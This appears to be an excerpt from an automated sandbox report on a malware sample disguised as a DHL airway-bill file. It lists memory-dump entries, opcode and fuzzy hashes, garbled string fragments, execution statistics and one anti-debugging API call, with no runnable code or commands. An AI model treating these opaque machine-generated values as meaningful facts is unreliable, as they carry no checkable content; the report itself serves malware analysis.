                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5892d0c70c92c3f8e513b72e8da0101c9d2b4141b2123257acabf580a97df699
                                            • Instruction ID: 9baef7664b61b30914da98d9a72933ad2f5c36a1a3dbf586a781cfd6d0811a7a
                                            • Opcode Fuzzy Hash: 5892d0c70c92c3f8e513b72e8da0101c9d2b4141b2123257acabf580a97df699
                                            • Instruction Fuzzy Hash: 9DB012B5696311AA4001B77C4ADBD7E94B1FBB6700BA08C11324585210CC208424DA27
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: !Y3E$Te]q$Te]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-1582036792
                                            • Opcode ID: a6012f0de3153efc8e9dbad76e52525ed2639042eae92dfe271e940b7734e4d9
                                            • Instruction ID: 80c15a5d26fb4597981a1fbf4edcc5cc762e9118b42f5c01a2f5f6ff1411c951
                                            • Opcode Fuzzy Hash: a6012f0de3153efc8e9dbad76e52525ed2639042eae92dfe271e940b7734e4d9
                                            • Instruction Fuzzy Hash: 2CA16F38B102198FD718DF69C899B6E7AF3BF88710F258429E906DB3A4DE70DC418B51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q$$]q$$]q
                                            • API String ID: 0-3083981010
                                            • Opcode ID: 98991bad8483e47f8e8c4b30ba31b7211e4be9f16255d9e6ad55a73b8e24b9f6
                                            • Instruction ID: 84d4466861e7e56148edd5b6292c3ce8f53f7d9f719081deb05af7e1fa12364b
                                            • Opcode Fuzzy Hash: 98991bad8483e47f8e8c4b30ba31b7211e4be9f16255d9e6ad55a73b8e24b9f6
                                            • Instruction Fuzzy Hash: 53A15E38B102198FD718DF69C999B6E7AB3BF88710F258469E906DB3A4DE70DC41CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q
                                            • API String ID: 0-127220927
                                            • Opcode ID: 0fbbc3ec2afe80b0637122705ed5b8914f74bd723b3b4fd889ebfde306c3915e
                                            • Instruction ID: 1e255beed4a00de175f754dcc4f171ccbbb7b46694b1de3aa9d5beac4cefdfbe
                                            • Opcode Fuzzy Hash: 0fbbc3ec2afe80b0637122705ed5b8914f74bd723b3b4fd889ebfde306c3915e
                                            • Instruction Fuzzy Hash: AF519138B012199FDB149F79C896B6E7AB3BF88710F154429E902EB7A4CE75CC41CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: T(z
                                            • API String ID: 0-3184255237
                                            • Opcode ID: 60cafe556a1a93faf5429a793edccd244f9c21c0be8f86e9d197bf2ca1e56308
                                            • Instruction ID: 77c4c5fbc1098873138a7b02499136538ccbfe5a5865b33eb8957948ab80fc85
                                            • Opcode Fuzzy Hash: 60cafe556a1a93faf5429a793edccd244f9c21c0be8f86e9d197bf2ca1e56308
                                            • Instruction Fuzzy Hash: EA41D931F092258BDB58CFB989929BFF7B7FBC8750F14842AD501AB294CE308D058752
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: T(z
                                            • API String ID: 0-3184255237
                                            • Opcode ID: d582e6bf112e9e4cbe90a43a1268b2f352ba64793de8f49769485b9066c2bad3
                                            • Instruction ID: 9ce5ae2b3c340a885a620d98028263d30298a5469f114d695a58e892eca8dc1d
                                            • Opcode Fuzzy Hash: d582e6bf112e9e4cbe90a43a1268b2f352ba64793de8f49769485b9066c2bad3
                                            • Instruction Fuzzy Hash: 2441D831F091258BDB58CEAD8592ABFF7B7EBCC750F10842AD501AB294DE318D058792
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ax^
                                            • API String ID: 0-994873808
                                            • Opcode ID: f2336426686cbda3944589d82125cf49a741d6bbe7a529d153da8b9ab44729ca
                                            • Instruction ID: e768564a5218167905b13c4900dc129e71c958fd5d3be7639baee6824287787f
                                            • Opcode Fuzzy Hash: f2336426686cbda3944589d82125cf49a741d6bbe7a529d153da8b9ab44729ca
                                            • Instruction Fuzzy Hash: 77419171F1526A8FCB40CFADD98A9AEFBF6FB98200B558126D90AF7350C234CD018B51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ax^
                                            • API String ID: 0-994873808
                                            • Opcode ID: a3f4b4187a5865039b4e29ba55f237acf6ade832095372bf495cfff6f4a6094d
                                            • Instruction ID: 5dcf1a008079e902183a9384d33b1b78bc5b5a067abf4164b2eef29cb0f7f162
                                            • Opcode Fuzzy Hash: a3f4b4187a5865039b4e29ba55f237acf6ade832095372bf495cfff6f4a6094d
                                            • Instruction Fuzzy Hash: 5B419231F1526A8FCB44CF9DD88A8AEFBF6FB98200B558126D50AFB350C234DD018B91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089054014.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_53e0000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6cf7bea6e6d407876ac8bb8c7d9dd3e03a07d0c91e0e4fe7f6e08c6fb099b97f
                                            • Instruction ID: f68e6b20ba782ed2bc68432c10d7ba347948ced5b0d70e853f0eb5d2296068c9
                                            • Opcode Fuzzy Hash: 6cf7bea6e6d407876ac8bb8c7d9dd3e03a07d0c91e0e4fe7f6e08c6fb099b97f
                                            • Instruction Fuzzy Hash: F01282B0CC1745CADB11CF66E95C18E3BA1BB8631CFD04A09E2612E2E5DBB415EACF45
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 216cc7d212b3bf7bc4b0cd288a2c5e17e1b7944ce4e6c2e274ed05401beb2668
                                            • Instruction ID: 7a242e21af0a667fc4f088a239c4753cdafb0926dfaa21094bdc254b8a569077
                                            • Opcode Fuzzy Hash: 216cc7d212b3bf7bc4b0cd288a2c5e17e1b7944ce4e6c2e274ed05401beb2668
                                            • Instruction Fuzzy Hash: 8EE11B74E041198FCB14DFA9C5919AEFBF2FF89304F248169E819AB356D730A942CF61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3bf97975d73ef5170572d6af59d755cdde794c91910eb8e5d85c4a4628e961d8
                                            • Instruction ID: d77af3a1d4fcbdb6d6bc8a8d7bb10d9b4e4d6f9ff5a8277cd797bd6954421f20
                                            • Opcode Fuzzy Hash: 3bf97975d73ef5170572d6af59d755cdde794c91910eb8e5d85c4a4628e961d8
                                            • Instruction Fuzzy Hash: 01E11B74E041198FCB14DFA9C5819AEFBF2FF89304F248169D819AB356D730A942CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9571c791c3b78b133beb2b9c7961ed15a2d821e8cd03d702d8a05deaf63b4f32
                                            • Instruction ID: 6a79bd15fa66773601d403c300885e111461d8b35f8b95cdf4347d2dc97ff92b
                                            • Opcode Fuzzy Hash: 9571c791c3b78b133beb2b9c7961ed15a2d821e8cd03d702d8a05deaf63b4f32
                                            • Instruction Fuzzy Hash: 81E10B74E041298FDB14DF99C5819AEFBF2FF89304F248169D819AB356D730A982CF61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9aa3dae4269698a65f25ba6480d1f91ef9dc7764fbb3bc37c23a4086edeeeae1
                                            • Instruction ID: ff125f503d6430374a78a24611ed0892e216b5f2db4376a36e93e45a146d3bc2
                                            • Opcode Fuzzy Hash: 9aa3dae4269698a65f25ba6480d1f91ef9dc7764fbb3bc37c23a4086edeeeae1
                                            • Instruction Fuzzy Hash: D9E11C74E041198FCB14DFA9C5819AEFBF2FF89304F248169D459AB356D730A942CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d5993ae20b6ffed9710bb6e7a44976f9baff5f5f4e57daf0a51be080a0d20c61
                                            • Instruction ID: 96588a96e2b5ba2297ae031895f0819a4e240dada99e058af39988e0a9c0f201
                                            • Opcode Fuzzy Hash: d5993ae20b6ffed9710bb6e7a44976f9baff5f5f4e57daf0a51be080a0d20c61
                                            • Instruction Fuzzy Hash: 92E12B74E041298FCB14DFA9C5919AEFBF2FF89304F248169D819AB356D730A942CF61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4e38f47fcda0eb474b83a8867e3cce2f3bd3c9fd5c06382b731d07a6576a87f0
                                            • Instruction ID: be4261c95e51f7dc1a210a4d4c4e9bb2b238371316468d512b3dd30597c7ac4d
                                            • Opcode Fuzzy Hash: 4e38f47fcda0eb474b83a8867e3cce2f3bd3c9fd5c06382b731d07a6576a87f0
                                            • Instruction Fuzzy Hash: 9ED11931C2061E8ADB11EF78D990699B7B1FFD5300F209B9AE50977224EF706AC5CB51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 55655a4681288adaaf7ee9ec6630ec9fc8e0cd4cf3f361142aaa88cb68c5056c
                                            • Instruction ID: 98d5a11685bdcba579afb5d91b82bef2d3bb8d1866c372c438bf4d767a39864f
                                            • Opcode Fuzzy Hash: 55655a4681288adaaf7ee9ec6630ec9fc8e0cd4cf3f361142aaa88cb68c5056c
                                            • Instruction Fuzzy Hash: 00A15B36E002098FCF0ADFA5D84099EB7B2FF85304B15856AE805AB365DB71ED55CF90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f8eab3ccee004a20ca3a440a7690d9be06c2d2c0d611d008d50eaa0c84b4a150
                                            • Instruction ID: c254d03b489ae6a87e101e445587deb4114238ac614933c851412a812c3c7095
                                            • Opcode Fuzzy Hash: f8eab3ccee004a20ca3a440a7690d9be06c2d2c0d611d008d50eaa0c84b4a150
                                            • Instruction Fuzzy Hash: 43D10831C2061E8ADB11EF78D990A99B7B1FFD5300F209B9AE50977224EF706AC5CB51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089054014.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_53e0000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dffcb5192901adca770142c51d6783658d450ff8e9bfe061947487aa22400ae8
                                            • Instruction ID: 858daf6ee5960e10a7ab774323adf1b9556975009c035add25b000261291c29b
                                            • Opcode Fuzzy Hash: dffcb5192901adca770142c51d6783658d450ff8e9bfe061947487aa22400ae8
                                            • Instruction Fuzzy Hash: F4C104B0CC0745CADB11CF66E85818E7BB1BB8631CFD54A09E2616F2E1DBB414AACF45
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8424082c211ca8062d23ef4283d02fdb6be48d1737c92702bcd0a6c8595d8b91
                                            • Instruction ID: c3ac0735c891e6d9a7a5667829acf4f0a21b899814b6cbbdf4d90d2a05f52384
                                            • Opcode Fuzzy Hash: 8424082c211ca8062d23ef4283d02fdb6be48d1737c92702bcd0a6c8595d8b91
                                            • Instruction Fuzzy Hash: 5F418235F05129DBCB04CFACD9C2DAEFBB7EF88210B50446AE905EB254DA319D518B91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1dcbc9367e18cfa8e8cf9d4c925d2400174e3a70d137132427b64a526b6d5bb8
                                            • Instruction ID: c42c7fe3fc04faaaf08f15e54f0b53b2cde9315887b455bd5b7bba3456bd24bd
                                            • Opcode Fuzzy Hash: 1dcbc9367e18cfa8e8cf9d4c925d2400174e3a70d137132427b64a526b6d5bb8
                                            • Instruction Fuzzy Hash: 59419235F15129DBCB04CFACE5C2CAEFBB7EF88210B50446AE905EB250DA319D518BC1

                                            Execution Graph

                                            Execution Coverage:11.1%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:1.5%
                                            Total number of Nodes:195
                                            Total number of Limit Nodes:22

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-3723351465
                                            • Opcode ID: 35720457b788136bdcea7f0506d909b40e6f79794954ada9789a4b12d1aceb98
                                            • Instruction ID: 56dd2721033c660bc5e83646c2e13bd1bf2ad6c960dceb3f417aeecbd54f42c0
                                            • Opcode Fuzzy Hash: 35720457b788136bdcea7f0506d909b40e6f79794954ada9789a4b12d1aceb98
                                            • Instruction Fuzzy Hash: 94322E31E1061A8FDB15EF75C89459DF7B2FFC9340F2186AAD409AB254EB30A985CB81

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q
                                            • API String ID: 0-127220927
                                            • Opcode ID: d2f880118e296b4ad191987f0d066be1585538bb4e2aff98ab009dd08c4efa5d
                                            • Instruction ID: 929513ad05e6f4efabd85f9bfbcc081d2c9aae213e97f800b959a17b2d8fcc0b
                                            • Opcode Fuzzy Hash: d2f880118e296b4ad191987f0d066be1585538bb4e2aff98ab009dd08c4efa5d
                                            • Instruction Fuzzy Hash: F102A130B102169FDB54EF69D4906AEB7E2FF84314F258529D80ADB394DB39DC82CB91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $
                                            • API String ID: 0-3993045852
                                            • Opcode ID: 8c77019808940e2829f8a1029da30d1cd764766709f7a53b7e825b477da80636
                                            • Instruction ID: e62bf6319cd2339426eb39aac210f6f67f84da3d4506a17e6b4ebea5ad7ed4ad
                                            • Opcode Fuzzy Hash: 8c77019808940e2829f8a1029da30d1cd764766709f7a53b7e825b477da80636
                                            • Instruction Fuzzy Hash: 5222B171E002199FDF64EFA5C4906AEB7B2FF89320F258469D809AF354DA35DC42CB91
                                            APIs
                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02F3712F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4515309497.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_2f30000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: CheckDebuggerPresentRemote
                                            • String ID:
                                            • API String ID: 3662101638-0
                                            • Opcode ID: 918b6f73817dbfe13f2ed658a3a9596a6001519ff458cbabd86d9c5889f3df0c
                                            • Instruction ID: ea62b03309e9886595eb3bf505ce41005c92c62515c826b16ededfec984bc903
                                            • Opcode Fuzzy Hash: 918b6f73817dbfe13f2ed658a3a9596a6001519ff458cbabd86d9c5889f3df0c
                                            • Instruction Fuzzy Hash: 362137B2D002598FDB10DFAAD884BEEFBF4AF49310F14845AE459A3250D778A944CFA1
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8f1fc9fbd3e77762b362d5891e93a282a30446a796c90bab0be4483331144054
                                            • Instruction ID: 637df5f27212af3534fa152f46e2d45657b0014897b648d4c881f05782924d32
                                            • Opcode Fuzzy Hash: 8f1fc9fbd3e77762b362d5891e93a282a30446a796c90bab0be4483331144054
                                            • Instruction Fuzzy Hash: FB62A130B002059FDB54EB68D594AADB7F2FF84314F658469E806EB361DB35EC86CB90
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 542355c6114d94d16103bde54c4bd6feab57c3d49f0e0a7ba43bb0dbb174fafb
                                            • Instruction ID: a5c0842bdf63f10a4dc737e0b987a0972880402c206cdbcdefb9e2233f9eb7a1
                                            • Opcode Fuzzy Hash: 542355c6114d94d16103bde54c4bd6feab57c3d49f0e0a7ba43bb0dbb174fafb
                                            • Instruction Fuzzy Hash: 9032C774B102059FDB54EF68D980BADB7B2FB48320F218529E906DB355DB39DC82CB91
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 33e91308d3a812812423f3d446c613b8b1eb3cdff2982e37a150bb46a7ec0ed4
                                            • Instruction ID: 8712d04f259939e31b15a6ca3367e3a9d2013614837e01e27e464598df8883e3
                                            • Opcode Fuzzy Hash: 33e91308d3a812812423f3d446c613b8b1eb3cdff2982e37a150bb46a7ec0ed4
                                            • Instruction Fuzzy Hash: 0B227274E101099BDF64EB69D4A07AEB7B2FB49311F218825E809DF391DB38DC81CB61

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-1273862796
                                            • Opcode ID: 9ec1001d1da2d87ec5ed04e9df72fbcb4a9e9ab754f5cc8c7c10b39fadbd9c09
                                            • Instruction ID: 78fa42a6bcaad90551650cc7e43f6e8d3f5b98e1685b21639e25ae35ff093d55
                                            • Opcode Fuzzy Hash: 9ec1001d1da2d87ec5ed04e9df72fbcb4a9e9ab754f5cc8c7c10b39fadbd9c09
                                            • Instruction Fuzzy Hash: ABE16070F1020A9FCB65EB69D4906AEB7B2FF85304F218629D906DB344DB35DC46CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-3723351465
                                            • Opcode ID: de7eff5fed5a2e61ddb5e19a304990bef29abc775b133a671f8e7498625a8477
                                            • Instruction ID: 9c2f10417d32a3b1d1100dbba2a4dd35e444a81e5c68a66e4cd22aca38eb2e72
                                            • Opcode Fuzzy Hash: de7eff5fed5a2e61ddb5e19a304990bef29abc775b133a671f8e7498625a8477
                                            • Instruction Fuzzy Hash: 08028370E1020A9FDB64EF58D4A06ADB7B2FB45311F22856AE815DF351DB34EC81CBA1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q
                                            • API String ID: 0-858218434
                                            • Opcode ID: 1f84594beee15d759d4905d867edbf86487ed6927443bbaf61e70f0a7b9b45ab
                                            • Instruction ID: 7e1593278d1d5206b792258c0b0668ba61010dc9fb68eecdea9c22ac45907c72
                                            • Opcode Fuzzy Hash: 1f84594beee15d759d4905d867edbf86487ed6927443bbaf61e70f0a7b9b45ab
                                            • Instruction Fuzzy Hash: 99912E70B1021A9BDB54DF65D8907AFB7F6BF88204F108569D80DEF344EB349D868B92

                                            Control-flow Graph (rendered graph and executed/not-executed legend not reproduced)
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q
                                            • API String ID: 0-182748909
                                            • Opcode ID: 41a76d5b3421734714ea16eb4595ed8222463334dea85498ca4a856c023796d5
                                            • Instruction ID: 98aedc6cd57f2d361d1fc6132544ebbe2c2fb1edefde10acc231b04e33ecf4ac
                                            • Opcode Fuzzy Hash: 41a76d5b3421734714ea16eb4595ed8222463334dea85498ca4a856c023796d5
                                            • Instruction Fuzzy Hash: A9626C7070020A9BCB65EB69D580A5DB7F2FF84304F218A29E409DF354DB39ED96CB85

                                            Control-flow Graph (rendered graph and executed/not-executed legend not reproduced)
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fbq$XPbq$\Obq
                                            • API String ID: 0-4057264190
                                            • Opcode ID: fec2e3a1af0bff1d9a0db178aae3ae0eedc359c52efe5b7b651fe93967a8abbd
                                            • Instruction ID: e1db72f3de8900a756c22de622e56a3b5bb3591e78f6105a7cba14dd8dcfbca4
                                            • Opcode Fuzzy Hash: fec2e3a1af0bff1d9a0db178aae3ae0eedc359c52efe5b7b651fe93967a8abbd
                                            • Instruction Fuzzy Hash: A5617170F002199FEB54EFA5C8547AEBAF6FB8C710F208429D50AAB395DB758C41CB91

                                            Control-flow Graph (rendered graph and executed/not-executed legend not reproduced)
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: X!@$x!@
                                            • API String ID: 0-2527372166
                                            • Opcode ID: 8b65645b8b4200fa0af5d87728fad7f2da2b2a0de78981281f6db2c2f7fbefe6
                                            • Instruction ID: f5f4e9398e60f91aa12d1c6c208cc8d7ed51faa5a4359b1e48e20ac968a2bf9f
                                            • Opcode Fuzzy Hash: 8b65645b8b4200fa0af5d87728fad7f2da2b2a0de78981281f6db2c2f7fbefe6
                                            • Instruction Fuzzy Hash: E681A431B002059FCF55EBA9E85069DB7F2EF88314F118529EA0AEB750DB35DD46CB90

                                            Control-flow Graph (rendered graph and executed/not-executed legend not reproduced)
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q
                                            • API String ID: 0-127220927
                                            • Opcode ID: a9913e961e65b9743fe843b459cc666443df7763b9bb3bdb7701200cf95b2d18
                                            • Instruction ID: 761d114f3273fce1ec30136ad6b48ae8c16f0a963f27a64bd6b9fdb58bdbec8a
                                            • Opcode Fuzzy Hash: a9913e961e65b9743fe843b459cc666443df7763b9bb3bdb7701200cf95b2d18
                                            • Instruction Fuzzy Hash: 25516270B101059FDB55DB79D890BAFB7F6FB88210F108969D809DF384EA349C42CBA2

